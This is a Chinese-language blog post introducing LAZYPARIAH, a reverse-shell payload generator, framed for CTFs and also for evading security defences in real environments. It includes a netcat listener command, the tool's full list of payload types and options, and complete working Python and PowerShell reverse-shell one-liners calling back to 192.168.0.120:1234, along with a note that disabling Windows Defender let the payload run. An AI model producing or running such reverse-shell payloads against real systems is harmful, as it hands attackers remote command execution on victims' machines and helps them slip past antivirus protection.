懒人必备之反弹SHELL

2022-04-07 16:19:56 浏览数 (2)

反弹 SHELL 是什么?其实是建立一个控制目标的简易管道,可以通过这个管道执行系统命令,而建立这个管道有非常多种方式,可以使用多种语言和命令,比如 python、bash、php、ruby 等,然后这些命令又记不住,每次使用都要去搜索或者去看以前的笔记,那么我这么懒,有没有一键生成所需 payload 呢?

今天分享一个开源项目,可以一键搞定 payload,项目地址:

https://github.com/octetsplicer/LAZYPARIAH

主要应用场景是在打 CTF 的时候,方便使用各种反弹 SHELL 的 payload,如果是实际环境,也可以使用这个工具来生成各类反弹 shell payload,用于对抗安全防御系统的检测。

接下来就测试一下这个小工具是否好用,首先在远程服务器监听一个端口,比如 1234:

代码语言:javascript复制
nc -vv -l -p 1234

服务器地址为 192.168.0.120,使用之前,首先安全必要运行环境:

代码语言:javascript复制
Ruby >= 2.7.1 (其他版本未经测试)
OpenJDK (可选,生成 java_class payload 时使用)
GCC (可选: 生成 c_binary payload 时使用)
Rust (可选: 生成 rust_binary payloads 时使用)

然后在 bin 目录下有该脚本的源代码,使用 ruby 编写,大概也能看的懂,可以生成的 payload 类型如下:

代码语言:javascript复制
C binary payloads (compiled on the fly): c_binary
Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
Powershell payloads: powershell_c, powershell_b64
Base64-encoded Python payloads: python_b64
Rust binary payloads (compiled on the fly): rust_binary
PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64
Java classes (compiled on the fly): java_class
Perl payloads: perl, perl_b64, perl_hex, perl_c
Simple PHP payloads (targeting specific file descriptors): php_fd, php_fd_c, php_fd_tags

拿到一个陌生的工具,首先要做的就是查看帮助信息:

代码语言:javascript复制
Usage:  lazypariah [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>
Note: <ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.
Example:  lazypariah -u python_b64 10.10.14.4 1555
Example:  lazypariah python_c malicious.local 1337
Valid Payloads:
    awk
    bash_tcp
    c_binary
    java_class
    nc
    nc_openbsd
    nc_pipe
    nodejs
    nodejs_b64
    nodejs_c
    nodejs_hex
    perl
    perl_b64
    perl_c
    perl_hex
    php_fd
    php_fd_c
    php_fd_tags
    php_system_python_b64
    php_system_python_hex
    php_system_python_ipv6_b64
    php_system_python_ipv6_hex
    powershell_b64
    powershell_c
    python
    python_b64
    python_c
    python_hex
    python_ipv6
    python_ipv6_b64
    python_ipv6_c
    python_ipv6_hex
    ruby
    ruby_b64
    ruby_c
    ruby_hex
    rust_binary
    socat
Valid Options:
    -h, --help                       Display help text and exit.
    -l, --license                    Display license information and exit.
    -u, --url                        URL-encode the payload.
    -v, --version                    Display version information and exit.
    -D, --fd INTEGER                 Specify the file descriptor used by the target for TCP. Required for certain payloads.
    -P, --pv INTEGER                 Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.
    -N, --no-new-line                Do not append a new-line character to the end of the payload.
        --b64                        Encode a c_binary, rust_binary or java_class payload in base-64.
        --hex                        Encode a c_binary, rust_binary or java_class payload in hexadecimal.
        --gzip                       Compress a c_binary, rust_binary or java_class payload using zlib.
        --gzip_b64                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.
        --gzip_hex                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.

大概看看,就能知道怎么用了,先生成一个 python_c 版的 payload,直接参数中添加服务端 IP 和 端口:

代码语言:javascript复制
./lazypariah python_c 192.168.0.120 1234

生成了如下的 payload:

代码语言:javascript复制
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.120",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

试试 payload 能不能用:

成功获得 shell,再来试试 powershell 的:

代码语言:javascript复制
./lazypariah powershell_c 192.168.0.120 1234

生成的 payload 为:

代码语言:javascript复制
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.120',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback   'PS '   (pwd).Path   '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

在服务器监听好端口后,在客户端执行该命令,服务器成功获得 shell:

然而在执行该命令时,被 defander 拦截了,关闭杀软再来一次,就可以了,那么如何免杀就是另外一回事儿了。

除了正常显示 payload 外,还支持各类 payload 的编码处理,比如 base64、hex 等,比如生成 powershell 的 base64 编码的 payload:

关于这个工具的原理,其实也很简单,只不过是把所有可以使用的 payload 进行了集成,然后方便使用,通过命令来生成你想要的任何 payload,而无需进行复制 payload 然后手工替换 IP 和端口,使用起来更方便。

如果你懂一点 ruby,那你可以基于这个工具的思路,编写属于你自己的小工具,以任何形式,剩下如何玩就看你自己了,如果觉得对你没啥用,忽略即可。

0 人点赞